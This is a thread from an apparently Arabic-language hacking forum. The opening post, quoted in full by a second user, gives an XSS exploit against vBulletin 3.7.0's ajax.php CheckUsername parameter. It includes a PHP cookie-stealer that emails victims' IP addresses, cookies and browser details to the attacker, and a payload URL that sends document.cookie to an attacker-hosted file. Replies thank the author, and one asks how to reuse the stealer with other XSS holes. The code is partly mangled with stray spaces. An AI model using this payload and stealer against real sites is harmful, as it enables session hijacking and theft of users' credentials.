ثغرة خطير في vBulletin 3.7.0

[d4rK-h4ck3r]

السلام عليكم


بدون مقدمآت


الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :

http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=**********alert('xss');</script>

آعمل ملف جديد

File.php
<?

$ Ip = $ _SERVER [ ’REMOTE_ADDR’];
$ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’];
$Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’];
$Co okie = $ _GET [ ’c’];
$Myemail = "YOUR E-MAIL;
$Date = today ( "l, j F, Y, g: ia");
$Subject = "Xss th30nR";
$Message = "Th30nuR () 2006
Ip: $ ip
Coo kies: $ coo kies
Browser: $ userAgent
Language: $ accept
URL: Basic $
Day & Time: $ today \\\\ n";
$ From = "From: $ myemail \\\\ r \\\\ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>

تطبيق:

www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script

مع انك تشيل الفراغات اللي في coo kie
وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz http://www.vbspiders.com/vb/t2298.html يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu

 

[PASSEWORD]

السلام عليكم


بدون مقدمآت


الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :

http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=**********alert('xss');</script>

آعمل ملف جديد

File.php
<?

$ Ip = $ _SERVER [ ’REMOTE_ADDR’];
$ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’];
$Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’];
$Co okie = $ _GET [ ’c’];
$Myemail = "YOUR E-MAIL;
$Date = today ( "l, j F, Y, g: ia");
$Subject = "Xss th30nR";
$Message = "Th30nuR () 2006
Ip: $ ip
Coo kies: $ coo kies
Browser: $ userAgent
Language: $ accept
URL: Basic $
Day & Time: $ today \\\\ n";
$ From = "From: $ myemail \\\\ r \\\\ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>

تطبيق:

www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script>

مع انك تشيل الفراغات اللي في coo kie

وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz http://www.vbspiders.com/vb/t2298.html يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu

دائما مبدع كالعادة
شكرا على الاهداء

 

[ZHech]

شكراشكرا

 

[d4rK-h4ck3r]

مشكور على مرورك يا الغالين ننتظروا جديدكم

 

[The Final Doom]

تسلـــم يا باشا على الثغرة دخان

 

[كنكشن]

اخوي عندي كم سؤال

س1: طيب ممكن توضح اكثر اين يخزن الكوكز او الباسورد هل يرسل على الايميل اما ماذا وين احط الايميل او ملف txt عشان تتخزن فيه معلومات الكوكز


س2: الملف هذا هل يمكن ان استخدمه في اي ثغر xss بعض ثغرة الميل روم يحط كود الثغره بعدين قوسين ويكتب xss يعني احط الملف هذا يصلح طبعا بعد رفعه على موقعي الخاص

رجاء الرد انا بحاجه للاجوبه.............................

 

[d4rK-h4ck3r]

مشكورين على المرور و بالنسبة للاخ كنكشن ساعمل موضوع عما قريب لجميع اسئلتك لكن اصبر علي شوي لان المدة هذي امتحانات ادعولي شباب

 

[hacker_dz]

شكراشكرا

 

[Dr-j0k]

مشكوووور خويا العزيز والله مبدعبطل

 

[كنكشن]

Da®k H@©K3R

مشكور اخوي وفي انتظارك

 

[PROF]

شكرا اخي علي الثغرة

 

[Hacking ghost]

مشكوور على الثغرة طخطخطخ

 

[العربي الصغير]

تسلم يدك اخي شكراً جزيلاً لك

 

[EXE]

العب مع التونسين و مت كالباقيندخان

 

[.: Dr.SmOoK :.]

يعطيك العافيه

لكن النسخه هذي قديمه ​

 

[muistafa]

ممكن اين نحط ذلك الملف؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟شكراشكراشكراشكراشكراطخطخطخطخطخطخطخبطل

 

[dr.net]

تسلم حبيبيشكرا

 

[p4w]

مشكور يا اخي:d

 

[ThE BlAcK SpIdEr]

شكرااااااااااااااااااا

 

[VIRUS-A]

شرح جيد حبيبي
و تغرت قوية لكن معضم المنتديات مرقعة منها
وحياك الله